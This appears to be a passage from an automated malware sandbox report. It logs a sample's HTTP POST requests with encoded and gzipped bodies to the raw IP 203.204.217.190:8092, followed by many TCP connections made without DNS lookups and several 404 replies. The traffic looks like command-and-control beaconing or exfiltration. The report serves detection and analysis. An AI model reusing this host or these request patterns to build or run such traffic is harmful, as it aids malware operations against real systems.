[Ep|eG3=xbIh/ca4nKNpNESmx5LsEiJE0qVooeQ+D9SdPBTHSqvDwbUiLyvUFJGf3N4dwqdJsF0e2XQjRo1u6Xg920RuUM3Q--- P1BnriSgCvfBdhQzpFYL9DzsyNS9Gq26mrC7GS/ZIIcMG4~&#X;4M:')cA%I.,^wL+}mj=X csj_\44+C
            Source: global trafficHTTP traffic detected: POST /oauth2/database/api/php/samples.html?d=71155844&og=18845628 HTTP/1.1Host: 203.204.217.190:8092User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36Content-Length: 2538Upgrade-Insecure-Requests: 1Accept-Encoding: gzipData Raw: 53 49 4d 4c 49 4e 20 4c 45 41 44 4d 45 4e 20 48 49 54 43 48 48 49 4b 45 52 20 4d 45 4e 54 49 4f 4e 45 44 20 52 4f 56 45 52 20 42 55 54 54 45 52 46 41 54 20 50 55 52 43 48 41 53 45 20 42 4f 54 43 48 49 45 53 54 20 43 48 45 45 52 49 4e 47 20 47 4f 4f 4d 42 41 48 20 43 52 4f 41 4b 20 4e 45 49 47 48 45 44 20 41 55 54 4f 52 4f 55 54 45 20 4b 45 43 4b 49 4e 47 20 4f 52 50 48 52 45 59 53 20 46 4f 4f 54 53 54 4f 43 4b 20 50 53 59 43 48 49 4e 47 20 43 49 4e 51 55 45 20 4d 45 4c 54 57 41 54 45 52 53 20 52 45 49 4d 42 55 52 53 45 20 54 48 49 4f 55 52 41 43 49 4c 53 20 47 45 4f 4d 41 47 4e 45 54 49 53 4d 20 44 45 53 54 41 49 4e 49 4e 47 20 51 55 49 4e 54 55 50 4c 45 54 20 54 48 49 43 4b 48 45 41 44 45 44 20 53 51 55 41 54 4c 59 20 48 45 4d 49 53 50 48 45 52 45 53 20 53 55 4c 4c 45 4e 4c 59 20 47 45 4e 54 41 4d 49 43 49 4e 20 4b 45 42 42 49 45 53 20 4e 4f 4e 47 4c 41 52 45 53 20 45 41 53 45 44 20 42 4c 55 45 43 41 50 53 20 4d 45 4c 54 41 47 45 53 20 5a 4f 4f 4c 4f 47 59 20 53 54 41 52 46 49 53 48 20 41 58 4f 4e 4f 4d 45 54 52 49 43 20 45 52 41 53 55 52 45 53 20 52 45 56 45 52 53 45 52 20 45 41 53 45 44 20 53 41 4d 50 48 49 52 45 20 42 52 41 4e 54 20 44 45 50 52 45 43 49 41 54 4f 52 20 43 52 41 50 4f 4c 41 53 20 43 48 45 45 52 49 4e 47 20 41 58 4f 4e 4f 4d 45 54 52 49 43 20 45 41 52 4c 44 4f 4d 53 20 53 41 4c 55 54 41 52 59 20 54 45 52 52 45 4e 45 53 20 41 44 4d 49 54 54 45 45 20 52 45 45 56 41 4c 55 41 54 45 53 20 55 50 53 49 5a 49 4e 47 20 53 41 4c 55 54 41 52 59 20 45 41 53 45 44 20 53 4f 55 54 48 57 45 53 54 45 52 20 54 48 49 4f 55 52 41 43 49 4c 53 20 42 45 41 4d 4c 45 53 53 20 44 4f 55 42 4c 45 48 45 41 44 45 52 20 42 4c 55 45 43 41 50 53 20 44 45 45 44 59 20 4e 41 5a 49 20 53 50 49 46 46 20 41 52 52 41 4e 47 45 44 20 46 4f 4f 4c 46 49 53 48 20 53 57 45 45 54 49 45 53 20 53 41 4e 44 42 41 52 53 20 4a 4f 59 50 4f 50 53 20 46 52 4f 53 54 42 49 54 20 53 4f 50 48 49 53 54 49 43 41 54 45 44 4c 59 20 52 45 4a 55 56 45 4e 41 54 4f 52 20 4d 45 54 48 41 44 4f 4e 20 53 4f 55 54 48 57 45 53 54 45 52 20 42 41 4c 4d 49 4e 45 53 53 45 53 20 4e 45 55 54 52 41 4c 4e 45 53 53 20 46 41 54 41 4c 49 53 4d 20 41 49 4c 45 52 4f 4e 20 4e 45 55 54 52 41 4c 4e 45 53 53 20 50 41 54 48 57 41 59 53 20 45 56 49 4e 43 49 4e 47 20 53 4f 55 54 48 57 45 53 54 45 52 20 44 45 50 52 45 43 49 41 54 4f 52 20 57 49 53 54 46 55 4c 4e 45 53 53 20 55 50 53 49 5a 49 4e 47 20 52 45 4a 55 56 45 4e 41 54 4f 52 20 50 55 4c 45 44 20 53 4c 49 43 4b 20 41 44 4d 49 54 54 45 45 20 42 55 43 4b 53 48 4f 54 20 44 52 41 46 46 49 45 52 20 4a 4f 59 50 4f 50 53 20 4b 45 59 53 54 4f 4e 45 20 46 41 44 45 41 57 41 59 20 50 41 43 48 41 4c 49 43 20 52 4f 55 47 48 4e 45 53 53 45 53 20 41 4e 54 49 4d 4f 4e
            Source: global trafficHTTP traffic detected: POST /db/api.html?x=19440630&xj=33556174 HTTP/1.1Host: 203.204.217.190:8092User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36Content-Length: 294Upgrade-Insecure-Requests: 1Accept-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 04 ff 00 0a 01 f5 fe cc f6 e3 a3 8e b1 5b a5 45 fd 70 f4 c8 fc 7c bc 65 c5 08 ae 47 80 e6 1b 0e 33 3d 78 df f5 a9 62 6b 46 78 37 6a 67 32 55 75 48 6e 59 6b 74 37 44 49 50 54 44 74 38 2f 33 67 70 35 35 66 64 43 4e 34 75 6d 51 73 66 72 72 51 52 63 0a 38 4c 46 70 37 53 76 37 4a 48 30 65 62 4a 6c 74 5a 2b 4b 58 68 35 32 64 4e 37 36 5a 66 48 2f 44 47 68 49 51 74 44 4a 2f 35 66 73 0a 2d 2d 2d 20 7a 59 56 64 75 72 6f 57 6e 6d 66 41 6e 31 4b 45 2f 63 42 75 6b 6b 56 5a 73 38 73 31 53 68 4d 6c 71 37 6e 51 71 6a 69 70 34 71 34 0a f2 5d 70 36 87 6c 2b 29 e7 7e a0 6f 1d 7d 51 ee e0 ec e0 30 cc 43 c0 59 ff 61 ea 27 4a 25 69 44 dc 27 d1 05 ac 6a 5e 66 46 cd 69 f5 12 a5 bd 78 c8 b3 5f 61 c5 68 d2 68 70 88 69 23 89 22 65 8e 0c 09 b8 55 0d be 5a 5b 8b b7 3b 63 ae a9 d8 a1 91 c8 07 2e f2 44 cd 11 60 e9 bd d1 41 09 f2 e6 41 36 01 00 00 ff ff 52 e8 3d 75 0a 01 00 00 Data Ascii: [Ep|eG3=xbkFx7jg2UuHnYkt7DIPTDt8/3gp55fdCN4umQsfrrQRc8LFp7Sv7JH0ebJltZ+KXh52dN76ZfH/DGhIQtDJ/5fs--- zYVduroWnmfAn1KE/cBukkVZs8s1ShMlq7nQqjip4q4]p6l+)~o}Q0CYa'J%iD'j^fFix_ahhpi#"eUZ[;c.D`AA6R=u
            Source: global trafficHTTP traffic detected: POST /oauth/database/namespaces/database/api/db/database/register.html?c=21322866&wd=a33556174 HTTP/1.1Host: 203.204.217.190:8092User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36Content-Length: 294Upgrade-Insecure-Requests: 1Accept-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 04 ff 00 0a 01 f5 fe cc f6 e3 a3 8e b1 5b a5 45 fd 70 f4 c8 fc 7c bc 65 c5 08 ae 47 80 e6 1b 0e 33 3d 78 df f5 a9 62 58 53 36 63 48 6e 36 65 4b 45 5a 31 62 4f 2f 67 58 64 37 4f 42 62 6e 67 68 48 33 68 59 4f 46 36 61 74 6b 70 59 62 67 77 79 31 6f 0a 77 58 6f 39 57 44 49 65 30 48 41 58 71 49 6e 56 34 77 68 32 52 54 7a 4c 2b 6c 51 34 71 56 4e 33 4b 6d 65 78 6c 4e 2f 74 73 6e 30 0a 2d 2d 2d 20 7a 71 66 33 77 62 55 51 61 64 77 45 38 77 42 44 6f 44 46 51 36 42 2b 52 54 4d 69 39 49 65 79 4d 78 75 32 47 7a 56 56 6c 67 41 6f 0a 1b b3 6e ad 1f 06 ae 82 96 4d 22 75 ce 05 f5 62 9b 45 e3 80 af 10 66 26 f9 0c 44 ab 76 8c 13 d6 08 13 2e 81 a0 12 65 a0 8e 89 85 1f 4b 12 08 42 ec 5f c0 ac 73 8e 20 03 ae 8a ce ec 59 f2 c0 8f 12 66 5d 94 6f 4d 35 d8 5e f4 03 3d e6 4e ae f4 3a fb a8 76 44 f9 b1 d1 8b 65 e6 f7 71 0c 1f e1 91 77 01 00 00 ff ff 6e 7d 5f 10 0a 01 00 00 Data Ascii: [Ep|eG3=xbXS6cHn6eKEZ1bO/gXd7OBbnghH3hYOF6atkpYbgwy1owXo9WDIe0HAXqInV4wh2RTzL+lQ4qVN3KmexlN/tsn0--- zqf3wbUQadwE8wBDoDFQ6B+RTMi9IeyMxu2GzVVlgAonM"ubEf&Dv.eKB_s Yf]oM5^=N:vDeqwn}_
            Source: global trafficHTTP traffic detected: POST /oauth2/oauth/db/api.html?_=36462oo14&ip=33556174 HTTP/1.1Host: 203.204.217.190:8092User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36Content-Length: 355Upgrade-Insecure-Requests: 1Accept-Encoding: gzipData Raw: 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 36 47 77 51 4f 34 7a 35 42 6a 6b 52 2d 2b 70 52 6f 76 6a 51 4f 30 5f 46 61 37 76 65 30 30 71 43 2d 38 78 34 36 75 6a 44 6f 44 72 50 36 4d 71 52 34 4a 6b 34 4c 2b 71 43 6b 53 62 34 48 53 75 43 30 38 77 46 36 6f 72 51 48 74 6e 73 34 52 76 43 5f 53 79 33 58 4a 70 35 79 68 72 51 48 46 6e 44 44 52 70 38 79 32 5f 35 75 74 6b 72 6e 4f 2d 52 48 2d 6f 43 6e 68 69 70 51 4c 66 64 2b 4a 2d 53 75 37 72 73 6f 76 2d 50 79 5f 71 52 79 4d 73 63 5f 39 70 74 42 4a 6a 71 75 38 75 38 4c 6d 78 46 30 52 72 34 34 4a 6f 53 36 72 76 38 52 47 6b 44 42 64 69 51 63 68 38 31 30 4d 59 63 6c 68 4c 4a 5a 59 52 33 48 71 42 66 37 42 64 56 63 4b 58 62 4a 56 38 79 35 63 50 38 6f 32 77 44 42 59 6c 7a 4c 79 2d 4a 6e 4c 37 59 76 50 37 73 39 38 34 75 54 36 6c 6d 55 70 45 7a 68 74 6f 75 51 41 2b 6d 62 36 77 68 43 62 33 79 34 75 78 4a 49 4c 71 69 5a 49 36 76 64 45 46 63 4a 72 30 5a 42 4f 4d 4d 47 6c 71 32 46 70 52 78 2d 70 59 4f 6e 74 58 38 6b 2d 4c 48 64 35 31 2d 47 Data Ascii: PmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIs6GwQO4z5BjkR-+pRovjQO0_Fa7ve00qC-8x46ujDoDrP6MqR4Jk4L+qCkSb4HSuC08wF6orQHtns4RvC_Sy3XJp5yhrQHFnDDRp8y2_5utkrnO-RH-oCnhipQLfd+J-Su7rsov-Py_qRyMsc_9ptBJjqu8u8LmxF0Rr44JoS6rv8RGkDBdiQch810MYclhLJZYR3HqBf7BdVcKXbJV8y5cP8o2wDBYlzLy-JnL7YvP7s984uT6lmUpEzhtouQA+mb6whCb3y4uxJILqiZI6vdEFcJr0ZBOMMGlq2FpRx-pYOntX8k-LHd51-G
            Source: global trafficHTTP traffic detected: POST /oauth/api/php/db/sign-up.html?_u=3355617q4&u=4866k2066 HTTP/1.1Host: 203.204.217.190:8092User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36Content-Length: 392Upgrade-Insecure-Requests: 1Accept-Encoding: gzipData Raw: 65 54 4b 66 61 61 61 61 61 61 61 63 5a 4e 61 68 61 41 74 59 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 36 55 7a 46 66 52 73 5f 75 37 5f 38 42 6d 5f 63 35 36 6b 44 48 6a 70 51 36 68 77 53 42 2b 6a 35 30 74 6e 45 66 38 6a 64 44 51 76 64 4c 48 78 43 6a 37 6b 72 78 4e 77 35 6f 30 62 34 6b 74 76 63 36 5f 6f 65 75 75 79 73 6e 4a 77 72 31 4f 76 38 35 66 6b 39 4b 53 6b 72 4f 71 71 38 79 52 6f 71 6b 46 75 39 58 2b 73 34 6f 53 6e 5f 79 48 6c 32 35 39 76 72 72 68 69 70 51 4c 66 63 35 6f 72 50 6b 2d 71 52 36 6e 6a 32 6b 43 6f 5f 79 30 71 50 61 4e 6a 63 52 4c 6b 32 42 34 2d 44 36 46 6f 70 58 76 6a 64 52 36 6f 73 42 76 78 38 6b 69 71 64 5f 62 2d 38 57 68 5a 6e 62 35 78 46 51 57 52 64 51 53 30 69 5a 61 54 50 36 47 6f 5f 6d 58 62 39 6d 4d 52 2d 59 58 69 4f 6e 73 4a 4e 45 78 6a 73 6f 36 4d 71 63 4a 63 70 35 65 73 38 62 64 62 52 65 35 68 50 44 5a 52 37 5a 6b 73 39 37 50 6a 78 74 4d 2b 71 74 70 39 32 76 39 71 70 54 2b 4f 44 61 2d 5a 5a 59 6b 4c 4a 5a 61 59 6c 49 6e 68 58 53 4d 30 64 4a 51 52 57 72 44 4b 2b 4e 33 49 74 49 55 55 6f 70 64 4a 30 72 30 61 61 32 5a 5a 56 46 65 39 38 57 68 61 6e 61 61 Data Ascii: eTKfaaaaaaacZNahaAtYPmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIs6UzFfRs_u7_8Bm_c56kDHjpQ6hwSB+j50tnEf8jdDQvdLHxCj7krxNw5o0b4ktvc6_oeuuysnJwr1Ov85fk9KSkrOqq8yRoqkFu9X+s4oSn_yHl259vrrhipQLfc5orPk-qR6nj2kCo_y0qPaNjcRLk2B4-D6FopXvjdR6osBvx8kiqd_b-8WhZnb5xFQWRdQS0iZaTP6Go_mXb9mMR-YXiOnsJNExjso6MqcJcp5es8bdbRe5hPDZR7Zks97PjxtM+qtp92v9qpT+ODa-ZZYkLJZaYlInhXSM0dJQRWrDK+N3ItIUUopdJ0r0aa2ZZVFe98Whanaa
            Source: global trafficHTTP traffic detected: POST /db/namespaces/signin.html?rp=33556174&w=6871591h9 HTTP/1.1Host: 203.204.217.190:8092User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36Content-Length: 392Upgrade-Insecure-Requests: 1Accept-Encoding: gzipData Raw: 65 54 4b 66 61 61 61 61 61 61 61 63 5a 4e 61 68 61 41 74 59 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 66 2b 2d 72 2d 4f 76 72 4c 75 6a 72 75 47 70 70 57 53 6b 73 35 6b 6e 72 44 34 5f 64 48 6f 6f 51 4c 44 77 64 4f 32 7a 35 30 74 79 38 4b 4e 75 72 4c 49 6f 38 72 37 6e 45 52 6f 62 45 6b 63 72 51 31 53 6c 64 75 4a 78 72 54 4a 73 73 42 30 78 73 42 42 75 5f 6f 49 2d 45 48 37 6e 44 79 66 79 51 52 62 78 34 6b 74 6c 5f 34 4e 79 38 44 50 76 51 36 6b 73 35 63 68 69 70 51 4c 66 35 5f 62 75 71 6b 2d 70 46 44 48 77 64 44 74 70 74 78 4f 78 39 4c 34 6f 34 2b 64 68 51 5f 46 6f 74 42 74 76 44 48 49 6e 72 6b 69 2d 45 42 76 6b 64 6f 36 6c 72 48 32 70 51 34 68 74 6f 59 33 47 71 4a 6c 43 66 78 34 75 56 2b 4a 75 4a 52 2d 35 49 51 4b 47 51 56 57 33 36 6e 6e 41 43 56 55 64 58 31 69 55 79 4c 7a 4d 44 4a 54 76 39 33 4e 53 44 54 4c 66 66 62 6a 69 6d 56 61 32 30 50 36 43 41 6d 75 58 63 39 41 55 54 4c 59 6a 38 73 55 66 44 63 52 51 4b 4c 58 69 51 73 42 38 55 35 32 37 63 41 4a 79 4f 64 72 65 79 63 43 51 42 36 55 50 50 72 37 49 56 74 41 56 54 35 5f 39 42 47 30 61 61 32 5a 5a 38 41 66 30 4b 6a 68 61 6e 61 61 Data Ascii: eTKfaaaaaaacZNahaAtYPmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIsf+-r-OvrLujruGppWSks5knrD4_dHooQLDwdO2z50ty8KNurLIo8r7nERobEkcrQ1SlduJxrTJssB0xsBBu_oI-EH7nDyfyQRbx4ktl_4Ny8DPvQ6ks5chipQLf5_buqk-pFDHwdDtptxOx9L4o4+dhQ_FotBtvDHInrki-EBvkdo6lrH2pQ4htoY3GqJlCfx4uV+JuJR-5IQKGQVW36nnACVUdX1iUyLzMDJTv93NSDTLffbjimVa20P6CAmuXc9AUTLYj8sUfDcRQKLXiQsB8U527cAJyOdreycCQB6UPPr7IVtAVT5_9BG0aa2ZZ8Af0Kjhanaa
            Source: global trafficHTTP traffic detected: POST /database/namespaces/oauth2/oauth/database/rpc.html?bs=3q3556174&n=5l3348718 HTTP/1.1Host: 203.204.217.190:8092User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36Content-Length: 355Upgrade-Insecure-Requests: 1Accept-Encoding: gzipData Raw: 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 36 66 79 5f 78 50 5f 74 34 38 78 53 6f 71 6e 51 4c 4b 6e 46 75 66 70 72 44 4e 6b 45 6b 5f 77 72 63 37 72 46 31 54 75 63 42 2d 5f 50 30 34 6f 45 6b 38 78 34 36 6e 78 32 35 6b 62 46 79 6b 5f 73 35 66 78 64 48 45 71 38 4c 64 73 74 34 4f 6a 51 48 44 6f 46 78 37 79 46 34 39 6b 64 35 72 6c 5f 6f 63 79 39 58 68 75 39 4b 38 5f 53 30 30 73 63 4f 35 5f 50 6e 68 69 70 51 4c 66 63 57 50 78 64 42 53 6b 73 44 62 6b 64 36 54 72 73 58 75 2d 50 72 51 2d 34 35 42 79 38 6f 42 76 52 79 6b 5f 45 5f 74 70 71 42 55 6e 74 44 35 2d 45 36 33 78 51 35 46 76 35 72 68 63 39 50 64 39 5f 6c 38 52 47 32 6c 49 55 43 69 42 73 39 4a 79 68 2d 6c 69 6f 72 51 68 4b 49 41 37 51 4f 56 73 4d 4a 49 44 68 4d 6a 59 50 5f 37 42 77 47 71 6a 66 48 75 35 6a 54 6f 43 38 4e 54 69 62 42 71 65 63 30 4a 4d 59 74 73 65 71 5f 49 31 70 33 57 45 4d 48 54 4f 51 77 55 72 65 69 4a 77 2d 4b 78 6f 66 45 36 53 74 32 57 59 2b 4d 7a 73 6f 48 4e 52 4b 47 43 76 50 44 4b 56 32 4c 45 33 4e 6a Data Ascii: PmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIs6fy_xP_t48xSoqnQLKnFufprDNkEk_wrc7rF1TucB-_P04oEk8x46nx25kbFyk_s5fxdHEq8Ldst4OjQHDoFx7yF49kd5rl_ocy9Xhu9K8_S00scO5_PnhipQLfcWPxdBSksDbkd6TrsXu-PrQ-45By8oBvRyk_E_tpqBUntD5-E63xQ5Fv5rhc9Pd9_l8RG2lIUCiBs9Jyh-liorQhKIA7QOVsMJIDhMjYP_7BwGqjfHu5jToC8NTibBqec0JMYtseq_I1p3WEMHTOQwUreiJw-KxofE6St2WY+MzsoHNRKGCvPDKV2LE3Nj
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownTCP traffic detected without corresponding DNS query: 203.204.217.190
            Source: unknownHTTP traffic detected: POST /rpc.html?o=7v7059308&sc=67086726 HTTP/1.1Host: 203.204.217.190:8092User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36Content-Length: 1209Upgrade-Insecure-Requests: 1Accept-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 04 ff 64 96 51 b2 e2 bc 0e 84 b7 a2 ad 28 76 27 d1 c1 b6 3c 92 0c 13 f6 bf 90 5b 26 43 e0 dc ff 85 82 22 71 5a ea af a5 b8 d4 22 8d a4 fd 20 85 68 73 f2 9b 54 5d a4 20 53 d2 5d 4b 86 39 99 0e 38 2d 23 02 b6 72 50 1f 96 76 76 d0 52 54 b3 c0 83 aa 78 d6 b1 84 b4 8d 0a 07 1a 32 79 80 f3 ca 1e 0d ee 70 6a 90 6d 47 26 1e a1 a6 23 40 95 47 45 98 c0 e9 87 ad 38 ad aa e1 a1 e9 46 dd 8f b4 4b db 68 e7 27 37 a7 8a 12 0f 0e 98 93 71 7e b0 07 9c 62 17 1d c6 49 8a d3 83 03 b6 16 d5 8c 4c 2e 36 ba d3 9f 21 2d 46 2f 08 8a 5d d2 6d 07 67 64 f2 3f 83 a3 1c b4 a3 8a f7 1d 06 27 ef b2 ae b4 a1 05 57 49 d2 e8 87 db 36 db d0 b4 6d 85 0d 4e 86 9d 17 1a b5 8b cd 32 0d 3f e3 8e c6 a1 46 49 47 0b 58 a0 65 b4 74 50 d2 87 da 0d 46 1b 2f 2b 3c 9c 92 71 d7 c2 4e 15 dc a4 6d 4e a3 bb 3c a5 6d 94 25 e7 02 73 f2 51 0a 5a 99 b7 b7 15 56 d1 c2 89 5b 48 d5 76 50 06 f2 41 e9 c9 f6 69 ce 29 c9 75 b4 3c 25 79 b0 ad e2 fb bf 6b 5d fb 2e 1e 92 38 90 cb 41 1d 2d 38 15 bc e5 de 45 0b 5a 9a bf ff c9 dd 47 db f4 0e 23 0f e0 55 65 19 1e c6 01 7a 00 b9 c8 0d 04 63 1f b3 1f 4b 91 da ff f3 90 8c 6e 48 f2 6a cb 02 ae 05 ee f4 10 8f 75 94 36 bf 73 29 9a f8 c4 6d 19 e9 e6 bb 06 ad a6 2d 92 0e 0b a7 ce b1 3f f8 70 4a 47 a8 07 87 24 9f 36 3c 61 4a 0f 09 27 0f 7d f0 52 40 9b 81 1d 0f d5 ec b4 72 70 11 af c4 52 60 da 3e 8a 17 b5 06 5a 59 ac 80 33 35 8c 30 3e c5 fc 3f a3 7d f4 8e 98 87 fd bb d8 c7 b2 b0 4b fb f8 90 76 58 d3 27 aa 24 ea 63 22 12 f8 33 64 7a fb 5d 9a d6 26 55 33 28 c0 8b b2 65 f2 b7 bd dc 3b 5a 96 bf 54 30 92 34 f8 e9 ea f5 6b 35 f5 58 24 28 71 ce e2 c8 94 71 17 9e 60 3d 55 8b 6e 07 5d 14 9d 0a 38 6b 9f 1d 15 8f 4f 1f d2 1b b9 ac 63 29 d8 c1 f9 74 f6 57 2a 2f a7 4f be 7e f4 e8 da 9d 76 b5 f6 69 59 da ff e1 c0 7f b5 69 45 98 24 32 dc 61 0e fb e8 6d 7a 9a 34 2e b4 5f cc 4a cb fa 40 26 1b f3 4b a3 a2 49 cf 8f 7e 18 42 d2 1b c8 2b 3f 1f 04 de 64 36 7e 0a e5 77 52 be 7d 9f 04 e4 4f 06 ae 9e 5d c1 39 5b 34 9a bf c6 d9 cc c9 75 ce 55 57 32 e5 db fc 79 59 7b 19 5f b9 65 ae c3 7f b9 7b 85 e0 ca c7 65 ea 79 54 45 09 de e0 84 bb b4 34 1f 7a ea 3c 3f 33 52 91 bb 84 60 e2 9e 76 2e 92 7e 71 b9 ea f3 98 12 4c 47 bc 08 b9 32 7e b9 7a 35 f9 7a f2 f7 a9 3e 3e f7 be a1 ce 9c e2 28 27 40 df d3 ab fb 91 5e b3 d6 b9 f6 5d 0c 57 84 e6 2c 58 86 94 d7 74 d9 b8 2e 9c e1 74 43 f1 b9 2c 46 f3 c4 e5 15 c4 c4 c6 15 45 9e 20 7f 00 af c2 0c bd 60 52 39 c5 5b 1f ee e4 5d d6 95 74 44 b7 19 f0 aa 4d 37 34 49 a4 73 ca 24 f1 d9 a8 d1 0c ae e5 fe 3a 78 15 43 d7 07 cc 67 ea 1b 92 69 27 1e 59 96 02 ff c5 c1 8a 0c e3 29 c1 69 e7 5a e7 51 eb 7b 26 f8 0f d7 45 6f b4 b1 35 f1 1d a0 cf 16 b9 20 b0 59 ee ec 9c cb 8c 9d 4f a1 8b b2 c7 d7 6d ce 65 04 db 31 ff eb af 22 74 c4 9d 47 0b 0a c3 c3 c9 77 94 99 8b b9 e6 76 35 e4 ef
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:20:30 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:20:30 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:20:30 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:20:33 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:20:36 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:20:39 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:22:34 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:22:34 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:22:36 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:22:37 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:22:41 GMTContent-Length: 0
